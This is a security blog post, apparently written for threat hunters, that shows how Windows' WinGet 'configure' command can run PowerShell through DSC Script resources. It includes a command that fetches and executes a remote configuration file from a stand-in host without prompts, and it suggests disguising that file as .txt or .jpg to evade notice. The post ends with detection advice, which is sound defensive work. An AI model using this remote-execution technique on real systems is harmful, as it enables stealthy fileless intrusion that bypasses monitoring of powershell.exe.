I. Introduction
In this article, I will provide a brief overview of the Windows Package Manager - WinGet. Following that, I will demonstrate how to use WinGet as a transit station to execute living off the land PowerShell scripts.
I hope the information provided during the Proof of Concept (POC) demo will assist threat hunters in supplementing their rules for monitoring fileless attack techniques.
II. Detailed explanation
1. Some basic information
A. What is WinGet?
WinGet is a command-line tool created by Microsoft to facilitate the management of applications on Windows systems. It's designed to streamline the process of installing, upgrading, configuring, and removing software. The tool is part of the broader Windows Package Manager platform and aims to make the software management experience more efficient and user-friendly.
It's similar to package managers commonly used in Linux environments.
WinGet is built into Windows 10 (build 1709 or later), Windows 11, and Windows Server 2025. This means that you won't need to install WinGet to use this LoLBin.
B. Analyze the execution flow of WinGet
Below are the execution parameters of WinGet.
I will delve into the analysis of the "configure" parameter.
The WinGet configure command is used to apply configuration settings to your Windows system based on a specified configuration file. This feature allows you to automate the setup and configuration of applications and system settings, making it easier to standardize environments or replicate settings across multiple machines. Additional details.
According to the documentation, the "configure" command will accept a WinGet Configuration file to make configuration changes as specified within it. These configuration files are in YAML-formatted. Further data.
If you want to learn more in detail, Microsoft also provides several sample configuration files.
From the sample files provided by Microsoft, I created a simplified file as follows.
|
| YAML file change Explorer setting |
You can test it yourself with the example file: Test-cfg.yaml
This file will adjust some configurations of Windows Explorer: File Extensions, Hidden Files, Item CheckBoxes, and restart Explorer.
To use the "configure" function, first run WinGet with the parameter “winget configure –enable” to enable it.
Then, provide WinGet with the configuration file just created.
winget configure -f "C:\Samples\winget\Test-cfg.yaml"
--accept-configuration-agreements
Information about the parameters:
- -f: the path to the location of the configuration file in YAML format.
- --accept-configuration-agreements: Accepts the configuration warning, preventing an interactive prompt. This will be more convenient when you need to run the command as part of a script file.
After running, the results will be printed to the console.
The execution flow of WinGet creates the following processes.
WinGet will run the program "ConfigurationRemotingServer.exe".
“ConfigurationRemotingServer.exe” will parse and execute the configuration requests contained in the received YAML file.
By monitoring the Registry, we will observe that the corresponding Values in the Explorer Key are being modified.
2. Use WinGet to execute a PowerShell script
A. Use local YAML file
WinGet use PowerShell Desired State Configuration (DSC) to automate the configuration of your Windows operating system.
Among them, the resource "Script" catches my attention the most.
“The Script resource enables you to write PowerShell code to get, test, and set a resource when a specific DSC resource isn't available. You must provide the code for these methods, handle all dependencies, and ensure your code is idempotent.”
After reviewing examples of how to create a YAML configuration file with the correct syntax, I was able to create a simple file as follows.
You can download the file via the following link: SimplePSScript.yaml
WinGet will execute some PowerShell commands and log them into a log file. I use the method of logging to a file because when executed successfully, the results will not be displayed in the console.
With the value "allowPrerelease" set to "true," WinGet will download the DSC Resource if it is not already available on the machine.
The DSC Resources will be stored in the path: "%LOCALAPPDATA%\Microsoft\WinGet\Configuration\Modules".
I will run with the configuration file above as follows.
winget configure --accept-configuration-agreements --disable-interactivity
-f "C:\Samples\winget\SimplePSScript.yaml"
In the above command, "--accept-configuration-agreements" and "--disable-interactivity" will help eliminate interruptions during execution that require waiting for input.
By checking the log file, we will obtain the results of the two commands "Get-Host" and "Get-ExecutionPolicy".
With the information above, we know that WinGet uses the namespace "System.Management.Automation" to execute PowerShell scripts.
B. Use remote YAML file
With each run, having to upload the configuration file to the machine where it needs to be executed causes a lot of inconvenience. If it could automatically download and execute, it would be more convenient and stay low-key.
And fortunately, WinGet also accepts a web link as a YAML configuration file.
I will change the command used in the previous section to the following:
winget configure --accept-configuration-agreements --disable-interactivity
-f https://simplehost.demo/ps-script.txt
Winget will automatically download the configuration file to its web cache folder. It will then execute this configuration file.
You can see that the file extension doesn't necessarily have to be .yaml. You can use file extensions like .txt or .jpg to blend into the background.
And of course, since it uses the namespace "System.Management.Automation," Antimalware Scan Interface (AMSI) will be involved in the process.
III. Conclusion
The creators of fileless malware are always searching for and using living-off-the-land binaries (lolbins) to fly under the radar on the victims' systems.
Fileless attacks are becoming increasingly common and sophisticated, which requires us to continuously supplement our monitoring and detection techniques and methods.
Winget is a tool available on Windows, intended to facilitate software management. However, it can also be exploited to execute malicious PowerShell code without the need to use powershell.exe, a program that is always closely monitored.
Winget uses configuration files in YAML format, and these files can not only be read from the local drive but can also be directly retrieved from the Internet.
As a threat hunter, you should keep an eye on Winget and its child processes (ConfigurationRemotingServer.exe), along with the event logs from AMSI.
Comments
Post a Comment